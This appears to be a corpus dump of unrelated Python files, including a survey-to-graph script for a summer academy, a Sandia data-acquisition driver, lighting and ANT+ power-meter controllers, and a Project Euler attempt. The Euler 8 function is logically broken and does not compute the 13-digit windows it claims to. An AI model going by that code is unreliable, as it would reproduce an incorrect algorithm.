details = ['解析:']
details.extend(item['answer_rich'])
ss_paragraphs.append(details)
return [ParagraphXmlObj(p) for p in ss_paragraphs]
class MultipleChoiceBlock(SingleChoiceBlock):
MODES = [6, ]
def _get_alone_answers(self):
ss_paragraphs = [[]]
i = 0
for item in self.questions:
p = '%s %s ' % (item['this_question_no'], item['right_option'])
ss_paragraphs[-1].append(p)
i += 1
if i % 5 == 0:
ss_paragraphs.append([])
return [ParagraphXmlObj(p) for p in ss_paragraphs]
class JudgeBlock(SingleChoiceBlock):
MODES = [7, ]
@staticmethod
def get_right_option(question):
if question['options'][0]['score'] > 0:
return '√'
return '×'
if __name__ == '__main__':
px = ParagraphXmlObj()
print(BlockParent(6, [], 'alone'))
|
986,937 | 6d6a4911ea6a13ca49507e8a338136e98f003731 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# EXPLANATION:
# This file reads in the people.csv and the files from the /data folder, and
# uses these data to create the nodes-and-edges.js.
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# LIBRARIES
# -----------------------------------------------------------------------------
import numpy as np
from itertools import product
# -----------------------------------------------------------------------------
# CLASSES
# -----------------------------------------------------------------------------
class Node():
"""
This class is used to represent nodes of the graph, i.e. people.
"""
def __init__(self, id, name, major, group):
# Basic properties
self.id = id
self.name = name
self.major = major
self.group = group
# Complex properties that need to be calculated
self.knows = 0
self.known_by = 1
# Additional properties from the questionaire
self.age = 0
self.academies = 0
self.waylength = 0
self.hiking = 0
self.lake = 0
self.choir = 0
self.games = 0
self.drinks = 0
self.sleep = 0
self.number = 0
self.hotness = 0
self.hookups = 0
self.description = ''
# -----------------------------------------------------------------------------
# FUNCTIONS
# -----------------------------------------------------------------------------
def LightColor(group):
colors = {1: 'rgb(230, 91, 119)',
3: 'rgb(146, 181, 242)',
4: 'rgb(238, 165, 77)',
5: 'rgb(100, 174, 100)',
6: 'rgb(255, 227, 77)',
7: 'rgb(129, 77, 168)'}
return colors[group]
def DarkColor(group):
colors = {1: 'rgb(220, 20, 60)',
3: 'rgb(100, 149, 237)',
4: 'rgb(230, 126, 0)',
5: 'rgb(34, 139, 34)',
6: 'rgb(255, 215, 0)',
7: 'rgb(75, 0, 130)'}
return colors[group]
def isEven(number):
return not number%2==0
def create_adjacency_matrix(n_people):
"""
This function loops over all files in /data and creates the adjacency
matrix from it.
"""
adjacency_array = []
for i in range(n_people):
try:
row = np.loadtxt('./data/{}.csv'.format(i), usecols=[1], delimiter=',')
except IOError:
row = np.array(n_people*[0])
adjacency_array.append(row)
return np.matrix(adjacency_array)
def apply_warshall_algorithm(w):
N = len(w)
d = [N*[0] for _ in range(N)]
for i, j in product(range(N), range(N)):
if w[i, j] == 0:
d[i][j] = np.inf
else:
d[i][j] = w[i, j]
d = np.array(d)
for k in range(N):
for i, j in product(range(N), range(N)):
d[i, j] = min(d[i, j], d[i, k] + d[k, j])
return d
def get_bar_sum():
"""Sums up all contributions to the bar"""
barsumme = 0
for node in list_of_nodes:
if node.drinks == "'?'":
continue
barsumme += int(node.drinks)
print barsumme
def scrabble_score(word):
"""Calculates the scrabble score of a word"""
score = {'a': 1, 'b': 3, 'c': 4, 'd': 1, 'e': 1, 'f': 4,
'g': 2, 'h': 2, 'i': 1, 'j': 6, 'k': 4, 'l': 2,
'm': 3, 'n': 1, 'o': 2, 'p': 4, 'q': 10, 'r': 1,
's': 1, 't': 1, 'u': 1, 'v': 6, 'w': 3, 'x': 8,
'y': 10, 'z': 3}
if len(word) > 15:
return 0
total = []
for letter in word:
if letter not in score.keys():
continue
total.append(score[letter.lower()])
return sum(total)
def replace_umlauts(string):
"""Replaces the German umlauts in a string"""
result = string.lower()
result = result.replace('ß', 'ss')
result = result.replace('ä', 'ae')
result = result.replace('ö', 'oe')
result = result.replace('ü', 'ue')
return result
def calculate_all_scrabble_scores():
"""Calculates the scrabble score for all words"""
for node in list_of_nodes:
word = replace_umlauts(node.description)
if word == "'?'":
continue
print word, scrabble_score(word)
def minDistance(pos):
distances = []
x, y = pos
for _ in positions:
x_, y_ = _
distances.append((x-x_)**2 + (y-y_)**2)
if not distances:
return 20001
else:
return np.min(distances)
def xy_from_group(group):
def pol2cart(rho, phi):
x = rho * np.cos(phi)
y = rho * np.sin(phi)
return [x, y]
number = {'1':0, '3':1, '4':2, '5':3, '6':4, '7':5}[group]
x_, y_ = pol2cart(1500, np.pi/3*number)
x = x_ + np.random.normal(0, 250)
y = y_ + np.random.normal(0, 250)
while minDistance([x, y]) < 20000:
x = x_ + np.random.normal(0, 250)
y = y_ + np.random.normal(0, 250)
positions.append([x, y])
return (x, y)
def get_node_by_id(list_of_nodes_, id):
for node in list_of_nodes_:
if node.id == id:
return node
def average_known_people():
"""Prints the average number of people known by one person"""
print 'Knows', np.mean([sum(list(np.ravel(adjacency_matrix[i])))
for i in range(n_people)])
print 'Is known', np.mean([sum(adjacency_matrix[:,i])
for i in range(n_people)])
def create_nodes_and_edges(list_of_nodes_, adjacency_matrix_):
"""
This function takes the list of nodes and the list of edges and creates
the JSON file from them.
"""
# Random numbers for the labels
random_numbers = np.arange(len(list_of_nodes_))
np.random.shuffle(random_numbers)
print random_numbers
# Update the nodes: Every node gets told how many other nodes know it
for node in sorted(list_of_nodes_, key=lambda x: x.id):
node.knows = int(sum(np.ravel(adjacency_matrix[node.id])))
node.known_by = int(np.ravel(sum(adjacency_matrix[:,node.id])))
# Update the nodes: Every node gets its questionaire answers
for node in sorted(list_of_nodes_, key=lambda x: x.id):
try:
with open('./data-answers/{}.csv'.format(node.id), 'r') as f:
answers = f.readlines()
node.age = answers[0].strip() if (answers[0].strip() and answers[0].strip() != '-1') else "'?'"
node.academies = answers[1].strip() if (answers[1].strip() and answers[1].strip() != '-1') else "'?'"
node.waylength = answers[2].strip() if (answers[2].strip() and answers[2].strip() != '-1') else "'?'"
node.hiking = answers[3].strip() if (answers[3].strip() and answers[3].strip() != '-1') else "'?'"
node.lake = answers[4].strip() if (answers[4].strip() and answers[4].strip() != '-1') else "'?'"
node.choir = answers[5].strip() if (answers[5].strip() and answers[5].strip() != '-1') else "'?'"
node.games = answers[6].strip() if (answers[6].strip() and answers[6].strip() != '-1') else "'?'"
node.drinks = answers[7].strip() if (answers[7].strip() and answers[7].strip() != '-1') else "'?'"
node.sleep = answers[8].strip() if (answers[8].strip() and answers[8].strip() != '-1') else "'?'"
node.number = answers[9].strip() if (answers[9].strip() and answers[9].strip() != '-1') else "'?'"
node.hotness = answers[10].strip() if (answers[10].strip() and answers[10].strip()!= '-1') else "'?'"
node.hookups = answers[11].strip() if (answers[11].strip() and answers[11].strip()!= '-1') else "'?'"
node.description = answers[12].strip() if (answers[12].strip() and answers[12].strip()!= '-1') else "'?'"
except IOError:
node.age = "'?'"
node.academies = "'?'"
node.waylength = "'?'"
node.hiking = "'?'"
node.lake = "'?'"
node.choir = "'?'"
node.games = "'?'"
node.drinks = "'?'"
node.sleep = "'?'"
node.number = "'?'"
node.hotness = "'?'"
node.hookups = "'?'"
node.description = "?"
with open('nodes-and-edges.js', 'w+') as f:
# Write the code for the Nodes to the file
# This is just the preamble
f.write('// The nodes for the graph \n')
f.write('var nodes = [ \n')
# And these are the actual data
for node in sorted(list_of_nodes_, key=lambda x: x.id):
pos = xy_from_group(node.group)
f.write('\t{{ id: {id}, '
'label: "{random_number}", '
'title: "<small style=\'font-family: Roboto Slab;\'>'
# 'Name: {label} <br>'
# 'Fach: {major} <br>'
'AG: {group} <br>'
'---<br>'
'Kennt {knows} Leute <br>'
'Wird gekannt von {known_by} Leuten <br>'
'---<br>'
'Alter: {age} <br>'
'Anzahl Sommerakademien: {academies} <br>'
'Anfahrtsdauer: {waylength} <br>'
'Wander-Tage: {hiking} <br>'
'See-Tage: {lake} <br>'
'Chor-Tage: {choir} <br>'
'Spieleabende: {games} <br>'
'Beitrag zur Barkasse: {drinks} <br>'
'Schlaf pro Nacht: {sleep} <br>'
'Lieblingszahl: {number} <br>'
'Eigene Attraktivität: {hotness} <br>'
'Hookup-Schätzung: {hookups} <br>'
'Neubeuern in einem Wort: {description}'
'</small>", '
'value: {value}, '
'group: {group}, '
'knows: {knows}, '
'known_by: {known_by}, '
'x: {x}, '
'y: {y}, '
'color: {{ border: "{border}", '
'background: "{background}", '
'highlight: {{ border: "{border}", '
'background: "{background}" }} }}, '
'original_color: {{ border: "{border}", '
'background: "{background}", '
'highlight: {{ border: "{border}", '
'background: "{background}" }} }}, '
'age: {age}, '
'academies: {academies}, '
'waylength: {waylength}, '
'hiking: {hiking}, '
'lake: {lake}, '
'choir: {choir}, '
'games: {games}, '
'drinks: {drinks}, '
'sleep: {sleep}, '
'number: {number}, '
'hotness: {hotness}, '
'hookups: {hookups}, '
'description: "{description}" }},\n'
.format(id=node.id,
random_number=random_numbers[node.id],
label=node.name,
major=node.major,
group=node.group,
x=pos[0],
y=pos[1],
knows=node.knows,
known_by=node.known_by,
value=node.known_by,
border=DarkColor(int(node.group)),
background=LightColor(int(node.group)),
age=node.age,
academies=node.academies,
waylength=node.waylength,
hiking=node.hiking,
lake=node.lake,
choir=node.choir,
games=node.games,
drinks=node.drinks,
sleep=node.sleep,
number=node.number,
hotness=node.hotness,
hookups=node.hookups,
description=node.description))
# Close the Node array properly
f.write(']; \n\n\n')
# Create the edges...
f.write('var edges = [\n')
# Now loop over the adjacency matrix to calculate the edges
n_people = len(adjacency_matrix_)
id = 0
for row in range(n_people):
for col in range(row):
# CASE 1: Both people said they know each other.
# We draw an undirected edge between them
if adjacency_matrix_[row, col] and adjacency_matrix_[col, row]:
startnode = get_node_by_id(list_of_nodes_, row)
color = DarkColor(int(startnode.group))
f.write('\t{{ id: {}, from: {}, to: {}, '
'color: "{}", original_color: "{}"}},\n'
.format(id, row, col, color, color))
id += 1
# CASE 2: Person in row knows person in col, but not vice versa
if adjacency_matrix_[row, col] and not adjacency_matrix_[col, row]:
startnode = get_node_by_id(list_of_nodes_, row)
color = DarkColor(int(startnode.group))
f.write('\t{{ id: {}, from: {}, to: {}, arrows: "to", '
'color: "{}", original_color: "{}"}},\n'
.format(id, row, col, color, color))
id += 1
# CASE 3: Person in col knows person in row, but not vice versa
if not adjacency_matrix_[row, col] and adjacency_matrix_[col, row]:
startnode = get_node_by_id(list_of_nodes_, col)
color = DarkColor(int(startnode.group))
f.write('\t{{ id: {}, from: {}, to: {}, arrows: "to", '
'color: "{}", original_color: "{}"}},\n'
.format(id, col, row, color, color))
id += 1
# Close the Edges array properly
f.write('];')
print 'Created nodes-and-edges.js!'
# -----------------------------------------------------------------------------
# MAIN PROGRAM
# -----------------------------------------------------------------------------
# This is where we keep track of all Node position
positions = []
# This is where we keep track of all nodes
list_of_nodes = []
# Read in the people.csv and initialize the Nodes from these data
with open('people.csv', 'r') as f:
for index, line in enumerate(f.readlines()):
name, major, group = map(lambda x: x.strip(), line.split(','))
new_node = Node(index, name, major, group)
list_of_nodes.append(new_node)
# The number of people in the graph
n_people = len(list_of_nodes)
# Get the adjacency matrix from the files in /data/
adjacency_matrix = create_adjacency_matrix(n_people)
# Create the nodes-and-edges.js
create_nodes_and_edges(list_of_nodes, adjacency_matrix)
# Apply the Warshall-algorithm to the adjacency matrix
##np.set_printoptions(threshold='nan')
##print set(np.ravel(apply_warshall_algorithm(adjacency_matrix)))
|
986,938 | 612b3a83ac203237a5386800f2127473e557a71f | from flask import Flask
app = Flask(__name__)
@app.route('/', methods=['GET'])
def home():
return "<h1>GET API </h1><p> Create a get api using python flask</p>"
app.run()
|
986,939 | 40728aeb26d115866a7a18d5bd944e4b01aadcaf | import os
import das
sandia_info = {
'name': os.path.splitext(os.path.basename(__file__))[0],
'mode': 'Sandia DSM'
}
def das_info():
return sandia_info
def params(info, group_name=None):
gname = lambda name: group_name + '.' + name
pname = lambda name: group_name + '.' + GROUP_NAME + '.' + name
mode = sandia_info['mode']
info.param_add_value(gname('mode'), mode)
info.param_group(gname(GROUP_NAME), label='%s Parameters' % mode,
active=gname('mode'), active_value=mode, glob=True)
info.param(pname('dsm_method'), label='Data Acquisition Method', default='Sandia LabView DSM',
values=['Sandia LabView DSM', 'TCP Stream for Sandia LabView DSM'],
desc='Each lab will have different data acquisition methods. Sandia passes the data from the DAQ '
'to python by writing the values locally or collecting them over the local TCP network.')
info.param(pname('das_comp'), label='Data Acquisition Computer', default='10 Node',
values=['10 Node', 'DAS 3', 'DAS 5', 'DAS 8'],
active=pname('dsm_method'), active_value=['Sandia LabView DSM'],
desc='Selection of the data acquisition system (if there are multiple options).')
info.param(pname('node'), label='Node at Sandia - Used to ID DAQ channel', default=10, active=pname('das_comp'),
active_value=['10 Node'],
desc='Selection of the EUT which will be used for the test (Sandia specific).')
GROUP_NAME = 'sandia'
PATH = 'C:\\python_dsm\\'
POINTS_FILE = 'C:\\python_dsm\\channels.txt'
DATA_FILE = 'C:\\python_dsm\\data.txt'
TRIGGER_FILE = 'C:\\python_dsm\\trigger.txt'
WFM_TRIGGER_FILE = 'C:\\python_dsm\\waveform trigger.txt'
# Data channels for Node 1
dsm_points_1 = {
'time': 'time',
'dc_voltage_1': 'dc_voltage',
'dc_current_1': 'dc_current',
'ac_voltage_1': 'ac_voltage',
'ac_current_1': 'ac_current',
'dc1_watts': 'dc_watts',
'ac1_va': 'ac_va',
'ac1_watts': 'ac_watts',
'ac1_vars': 'ac_vars',
'ac1_freq': 'ac_freq',
'ac_1_pf': 'ac_pf',
'pythontrigger': 'trigger',
'ametek_trigger': 'ametek_trigger'
}
# Data channels for Node 2
dsm_points_2 = {
'time': 'time',
'dc_voltage_2': 'dc_voltage',
'dc_current_2': 'dc_current',
'ac_voltage_2': 'ac_voltage',
'ac_current_2': 'ac_current',
'dc2_watts': 'dc_watts',
'ac2_va': 'ac_va',
'ac2_watts': 'ac_watts',
'ac2_vars': 'ac_vars',
'ac1_freq': 'ac_freq',
'ac_2_pf': 'ac_pf',
'pythontrigger': 'trigger',
'ametek_trigger': 'ametek_trigger'
}
# Data channels for Node 3
dsm_points_3 = {
'time': 'time',
'dc_voltage_3': 'dc_voltage',
'dc_current_3': 'dc_current',
'ac_voltage_3': 'ac_voltage',
'ac_current_3': 'ac_current',
'dc3_watts': 'dc_watts',
'ac3_va': 'ac_va',
'ac3_watts': 'ac_watts',
'ac3_vars': 'ac_vars',
'ac1_freq': 'ac_freq',
'ac_3_pf': 'ac_pf',
'pythontrigger': 'trigger',
'ametek_trigger': 'ametek_trigger'
}
# Data channels for Node 4
dsm_points_4 = {
'time': 'time',
'dc_voltage_4': 'dc_voltage',
'dc_current_4': 'dc_current',
'ac_voltage_4': 'ac_voltage',
'ac_current_4': 'ac_current',
'dc4_watts': 'dc_watts',
'ac4_va': 'ac_va',
'ac4_watts': 'ac_watts',
'ac4_vars': 'ac_vars',
'ac1_freq': 'ac_freq',
'ac_4_pf': 'ac_pf',
'pythontrigger': 'trigger',
'ametek_trigger': 'ametek_trigger'
}
# Data channels for Node 5
dsm_points_5 = {
'time': 'time',
'dc_voltage_5': 'dc_voltage',
'dc_current_5': 'dc_current',
'ac_voltage_5': 'ac_voltage',
'ac_current_5': 'ac_current',
'dc5_watts': 'dc_watts',
'ac5_va': 'ac_va',
'ac5_watts': 'ac_watts',
'ac5_vars': 'ac_vars',
'ac1_freq': 'ac_freq',
'ac_5_pf': 'ac_pf',
'pythontrigger': 'trigger',
'ametek_trigger': 'ametek_trigger'
}
# Data channels for Node 6
dsm_points_6 = {
'time': 'time',
'dc_voltage_6': 'dc_voltage',
'dc_current_6': 'dc_current',
'ac_voltage_6': 'ac_voltage',
'ac_current_6': 'ac_current',
'dc6_watts': 'dc_watts',
'ac6_va': 'ac_va',
'ac6_watts': 'ac_watts',
'ac6_vars': 'ac_vars',
'ac6_freq': 'ac_freq',
'ac_6_pf': 'ac_pf',
'pythontrigger': 'trigger',
'ametek_trigger': 'ametek_trigger'
}
# Data channels for Node 7
dsm_points_7 = {
'time': 'time',
'dc_voltage_7': 'dc_voltage',
'dc_current_7': 'dc_current',
'ac_voltage_7': 'ac_voltage',
'ac_current_7': 'ac_current',
'dc7_watts': 'dc_watts',
'ac7_va': 'ac_va',
'ac7_watts': 'ac_watts',
'ac7_vars': 'ac_vars',
'ac6_freq': 'ac_freq',
'ac_7_pf': 'ac_pf',
'pythontrigger': 'trigger',
'ametek_trigger': 'ametek_trigger'
}
# Data channels for Node 8
dsm_points_8 = {
'time': 'time',
'dc_voltage_8': 'dc_voltage',
'dc_current_8': 'dc_current',
'ac_voltage_8': 'ac_voltage',
'ac_current_8': 'ac_current',
'dc8_watts': 'dc_watts',
'ac8_va': 'ac_va',
'ac8_watts': 'ac_watts',
'ac8_vars': 'ac_vars',
'ac6_freq': 'ac_freq',
'ac_8_pf': 'ac_pf',
'pythontrigger': 'trigger',
'ametek_trigger': 'ametek_trigger'
}
# Data channels for Node 9
dsm_points_9 = {
'time': 'time',
'dc_voltage_9': 'dc_voltage',
'dc_current_9': 'dc_current',
'ac_voltage_9': 'ac_voltage',
'ac_current_9': 'ac_current',
'dc9_watts': 'dc_watts',
'ac9_va': 'ac_va',
'ac9_watts': 'ac_watts',
'ac9_vars': 'ac_vars',
'ac6_freq': 'ac_freq',
'ac_9_pf': 'ac_pf',
'pythontrigger': 'trigger',
'ametek_trigger': 'ametek_trigger'
}
# Data channels for Node 10
dsm_points_10 = {
'time': 'time',
'dc_voltage_10': 'dc_voltage',
'dc_current_10': 'dc_current',
'ac_voltage_10': 'ac_voltage',
'ac_current_10': 'ac_current',
'dc10_watts': 'dc_watts',
'ac10_va': 'ac_va',
'ac10_watts': 'ac_watts',
'ac10_vars': 'ac_vars',
'ac6_freq': 'ac_freq',
'ac_10_pf': 'ac_pf',
'pythontrigger': 'trigger',
'ametek_trigger': 'ametek_trigger'
}
dsm_points_map = {
'1': dsm_points_1,
'2': dsm_points_2,
'3': dsm_points_3,
'4': dsm_points_4,
'5': dsm_points_5,
'6': dsm_points_6,
'7': dsm_points_7,
'8': dsm_points_8,
'9': dsm_points_9,
'10': dsm_points_10
}
class Data(das.Data):
def extract_points(self, points_str):
x = points_str.replace(' ', '_').replace('][', ' ').strip('[]').split()
for p in x:
if p.find(',') != -1:
return p.split(',')
def __init__(self, ts, dsm_id=None, data_file=DATA_FILE, points_file=POINTS_FILE, points=None):
das.Data.__init__(self, ts)
self._data_file = data_file
self._points = points
self._points_map = dsm_points_map.get(str(dsm_id), dsm_points_10)
self.read_error_count = 0
self.read_last_error = ''
if self._points is None:
self._points = []
if points_file is not None:
f = open(points_file)
channels = f.read()
f.close()
self._points = self.extract_points(channels)
for p in self._points:
point_name = self._points_map.get(p)
if point_name is not None:
self[point_name] = None
def read(self):
try:
f = open(self._data_file)
data = f.read()
f.close()
points = self.extract_points(data)
if len(points) == len(self._points):
for i in range(len(self._points)):
# get normalized name
point_name = self._points_map.get(self._points[i])
if point_name is not None:
self[point_name] = float(points[i])
except Exception, e:
self.read_error_count += 1
self.read_last_error = str(e)
def __str__(self):
'''
s = 'dsm_data:\n'
for k, v in dsm_points.iteritems():
s += ' %s: %s\n' % (v, self[v])
return s
'''
pass
class Trigger(das.Trigger):
def __init__(self, ts, filename=TRIGGER_FILE):
das.Trigger.__init__(self, ts)
self.filename = filename
self.on_error_count = 0
self.on_last_error = ''
self.off_error_count = 0
self.off_last_error = ''
def on(self):
try:
f = open(self.filename, 'w')
# f.write('trigger')
f.close()
except Exception, e:
self.on_error_count += 1
self.on_last_error = str(e)
def off(self):
try:
os.remove(self.filename)
except Exception, e:
self.off_error_count += 1
self.off_last_error = str(e)
class DAS(das.DAS):
"""
Template for grid simulator implementations. This class can be used as a base class or
independent grid simulator classes can be created containing the methods contained in this class.
"""
def __init__(self, ts, group_name):
das.DAS.__init__(self, ts, group_name)
self.ts.log('dsm_method = %s' % self.param_value('dsm_method'))
def param_value(self, name):
return self.ts.param_value(self.group_name + '.' + GROUP_NAME + '.' + name)
def data_init(self):
return Data(self.ts)
def config(self):
"""
Perform any configuration for the simulation based on the previously
provided parameters.
"""
pass
def open(self):
"""
Open the communications resources associated with the grid simulator.
"""
pass
def close(self):
"""
Close any open communications resources associated with the grid
simulator.
"""
pass
def value_capture(self):
pass
def waveform_capture(self):
pass
def trigger_init(self):
return Trigger(self.ts)
def trigger(self, state=None):
pass
if __name__ == "__main__":
pass
|
986,940 | af4f1b93d4cb18933e9bd340b13c69ab5bfedd35 | # viewer_cluster.py
#Programmer: Tim Tyree
#Date: 3.22.2022
#the idea is to generate a lot of textures, batch_size, quickly on gpu, and then to make one task for each batch_size on a cpu processor that does matplotlib
from ..utils.parallel import eval_routine_daskbag
def eval_viewer_cluster(task_lst,routine_to_png,npartitions,printing=True,**kwargs):
"""
Example Usage:
start=time.time()
retval=eval_viewer_cluster(task_lst=task_lst,routine_to_png=routine_to_png_streaming_tips,npartitions=npartitions,printing=True)
if printing:
print(f"the apparent run time for plotting was {(time.time()-start)/60:.1f} minutes")
"""
if printing:
batch_size=len(task_lst)
print (f"generating {batch_size} .png files over {npartitions} cores...")
retval=eval_routine_daskbag(routine=routine_to_png,task_lst=task_lst,npartitions=npartitions,printing=printing,**kwargs)
return retval
|
986,941 | 64520b48a701fab205cf9007ab6bcf4d4cbf25d7 |
import networkx as nx
from math import sqrt, fabs
from sensors.pointsamplecam import PointSampleImage
#@profile
def extract_blobs_closest_points(this_robot, in_image, active_mask):
""" Extracts blobs from the given image, each represented by the pixel
closest to the robot. """
out_image = PointSampleImage(in_image.calib_array, in_image.neighbour_array)
G = nx.Graph()
# First add all nodes, where each node consists of an index into
# calib_array for one of the active pixels.
for i in range(in_image.n_rows):
G.add_node(i)
# We will add edges between neighbouring pixels. See
# sensors/pointsamplecam for the definition of neighbouring.
node_list = G.nodes()
n = len(node_list)
for i in range(n):
if in_image.masks[i] & active_mask != 0:
(ixi, iyi) = in_image.calib_array[i,0], in_image.calib_array[i,1]
for j in in_image.neighbour_array[i]:
if in_image.masks[j] & active_mask != 0:
G.add_edge(i, j)
clusters = nx.connected_component_subgraphs(G, copy=False)
n_clusters = 0
for cluster in clusters:
n_clusters += 1
# Find the closest pixel to the robot in this cluster.
closest_i = None
closest_distance = float('inf')
for i in cluster.nodes():
#(xr, yr) = in_image.calib_array[i,2], in_image.calib_array[i,3]
#d = sqrt(xr*xr + yr*yr)
# The pre-computed distance sqrt(xr*xr + yr*yr)
d = in_image.calib_array[i,5]
if d < closest_distance:
closest_i = i
closest_distance = d
if closest_i != None:
out_image.masks[closest_i] = in_image.masks[closest_i]
return out_image
|
986,942 | 426be99cf83f2e8aae644b8d05a4955d96971fd3 | from corsair import init, set_color_corsair
from nzxt import set_color_nzxt
from razer import init_razer, set_color_razer, heartbeat_thread
import threading, time
from flask import Flask, request
from debounce import debounce
def from_hsv(hsv):
[h, s, v] = hsv
c = v * s
x = c * (1 - abs((h/60) % 2 - 1))
m = v - c
rgb = [0, 0, 0]
if h >= 0 and h < 60:
rgb = [c, x, 0]
if h >= 60 and h < 120:
rgb = [x, c, 0]
if h >= 120 and h < 180:
rgb = [0, c, x]
if h >= 180 and h < 240:
rgb = [0, x, c]
if h >= 240 and h < 300:
rgb = [x, 0, c]
if h >= 300 and h <360:
rgb = [c, 0, x]
rgb = list(map(lambda z: int((z + m) * 255), rgb))
return rgb
init()
init_razer()
current_hsv = [270, 1, 1]
@debounce(2)
def set_colors_hsv():
current_colors = from_hsv(current_hsv)
set_color_corsair(current_colors[0], current_colors[1], current_colors[2])
set_color_razer(current_colors[0], current_colors[1], current_colors[2])
set_color_nzxt(current_colors[0], current_colors[1], current_colors[2])
set_color_corsair(current_colors[0], current_colors[1], current_colors[2])
set_color_razer(current_colors[0], current_colors[1], current_colors[2])
set_color_nzxt(current_colors[0], current_colors[1], current_colors[2])
set_colors_hsv()
app = Flask(__name__)
@app.route('/')
def hello_world():
return 'Hello, World!'
@app.route('/set', methods=['POST'])
def set_colors_route():
print(request.json)
r = request.json['r']
g = request.json['g']
b = request.json['b']
set_color_corsair(r, g, b)
set_color_razer(r, g, b)
return "ok"
@app.route('/hb/on', methods=['GET'])
def hb_on_route():
if current_hsv[2] == 0:
current_hsv[2] = 1
set_colors_hsv()
return "ok"
@app.route('/hb/off', methods=['GET'])
def hb_off_route():
current_hsv[2] = 0
set_colors_hsv()
return "ok"
@app.route('/hb/status', methods=['GET'])
def hb_status_route():
if current_hsv[2] > 0:
return "1"
else:
return "0"
@app.route('/hb/saturation/set/<saturation>', methods=['GET'])
def hb_saturation_set_route(saturation):
current_hsv[1] = float(saturation) / 100
set_colors_hsv()
return "ok"
@app.route('/hb/saturation/status', methods=['GET'])
def hb_saturation_status_route():
return str(current_hsv[1] * 100)
@app.route('/hb/brightness/set/<brightness>', methods=['GET'])
def hb_brightness_set_route(brightness):
current_hsv[2] = float(brightness) / 100
set_colors_hsv()
return "ok"
@app.route('/hb/brightness/status', methods=['GET'])
def hb_brightness_status_route():
return str(current_hsv[2] * 100)
@app.route('/hb/hue/set/<hue>', methods=['GET'])
def hb_hue_set_route(hue):
current_hsv[0] = float(hue)
set_colors_hsv()
return "ok"
@app.route('/hb/hue/status', methods=['GET'])
def hb_hue_status_route():
return str(current_hsv[0])
app.run(host='0.0.0.0', port=80) |
986,943 | 8e67898af8e1d8a24681d4222f972d2fd3f5507a | # github.com/spokenlore
# Project Euler Problem 8
# What is the largest product that can be made with 13 consecutive numbers in this 1000 digit number?
# Answer: 23514624000
import time
from math import pow
fullNum = 7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450
def largestConsecutiveProduct(number, numDigits):
currentDigits = 0
maxProduct = 0
maxDigits = 0
currentExp = 10
useNum = fullNum
while (useNum > 10):
if (useNum % 10 == 0 and currentDigits == 0):
useNum = useNum / 10
if (useNum % 10 == 0):
product = calculateProduct(currentDigits)
if product > maxProduct:
maxProduct = product
maxDigits = currentDigits
if (currentDigits > 1000000000000 and currentDigits < 10000000000000):
product = calculateProduct(currentDigits)
if product > maxProduct:
maxProduct = product
maxDigits = currentDigits
if (currentDigits > 10000000000000):
currentDigits = currentDigits % 1000000000000
product = calculateProduct(currentDigits)
if product > maxProduct:
maxProduct = product
maxDigits = currentDigits
else:
currentDigits *= 10
currentDigits += (useNum % 10)
useNum = useNum / 10
print maxDigits
return maxProduct
def calculateProduct(number):
product = 1
while number > 0:
product *= number % 10
number = number / 10
return product
# Test case for calculateproduct (of digits)
# print calculateProduct(982387238)
print largestConsecutiveProduct(fullNum, 13) |
986,944 | 269ad5fa21b488f306cbfd5d9080e44fdfea4a83 | #!/usr/bin/env python
import sys
import time
import platform
import tkinter as tk
from ant.core import driver
from ant.core import node
from usb.core import find
from PowerMeterTx import PowerMeterTx
from config import DEBUG, LOG, NETKEY, POWER_SENSOR_ID
antnode = None
power_meter = None
def stop_ant():
if power_meter:
print("Closing power meter")
power_meter.close()
power_meter.unassign()
if antnode:
print("Stopping ANT node")
antnode.stop()
pywin32 = False
if platform.system() == 'Windows':
def on_exit(sig, func=None):
stop_ant()
try:
import win32api
win32api.SetConsoleCtrlHandler(on_exit, True)
pywin32 = True
except ImportError:
print("Warning: pywin32 is not installed, use Ctrl+C to stop")
def disable_event():
pass
try:
devs = find(find_all=True, idVendor=0x0fcf)
for dev in devs:
if dev.idProduct in [0x1008, 0x1009]:
stick = driver.USB2Driver(log=LOG, debug=DEBUG, idProduct=dev.idProduct, bus=dev.bus, address=dev.address)
try:
stick.open()
except:
continue
stick.close()
break
else:
print("No ANT devices available")
if getattr(sys, 'frozen', False):
input()
sys.exit()
antnode = node.Node(stick)
print("Starting ANT node")
antnode.start()
key = node.Network(NETKEY, 'N:ANT+')
antnode.setNetworkKey(0, key)
print("Starting power meter with ANT+ ID " + repr(POWER_SENSOR_ID))
try:
# Create the power meter object and open it
power_meter = PowerMeterTx(antnode, POWER_SENSOR_ID)
power_meter.open()
except Exception as e:
print("power_meter error: " + repr(e))
power_meter = None
master = tk.Tk()
master.title("Bot")
master.geometry("200x50")
master.resizable(False, False)
master.call('wm', 'attributes', '.', '-topmost', '1')
master.protocol("WM_DELETE_WINDOW", disable_event)
w = tk.Scale(master, from_=0, to=1000, length=200, orient=tk.HORIZONTAL)
w.pack()
last = 0
stopped = True
print("Main wait loop")
while True:
try:
t = int(time.time())
if t >= last + 1:
power = w.get()
if power:
power_meter.update(power)
stopped = False
elif not stopped:
power_meter.update(power)
stopped = True
last = t
master.update_idletasks()
master.update()
except (KeyboardInterrupt, SystemExit):
break
except Exception as e:
print("Exception: " + repr(e))
if getattr(sys, 'frozen', False):
input()
finally:
if not pywin32:
stop_ant()
|
986,945 | 6f6f3c15ecc4b3e9235bad0104f92fbc670dc5ee | import pandas as pd
import os
import numpy as np
import matplotlib.pyplot as plt
df = pd.read_csv("~/Desktop/adult.txt", header=None)
df = df.iloc[np.random.permutation(len(df))]
df.columns = ["age", "workclass", "fnlwgt", "education", "education-num", "maritalstatus", "occupation", "relationship",
"race", "sex", "capital-gain", "capital-loss", "hours-per-week", "nativecountry", "salary"]
#Processing each column with categorical value
from sklearn import preprocessing
le = preprocessing.LabelEncoder()
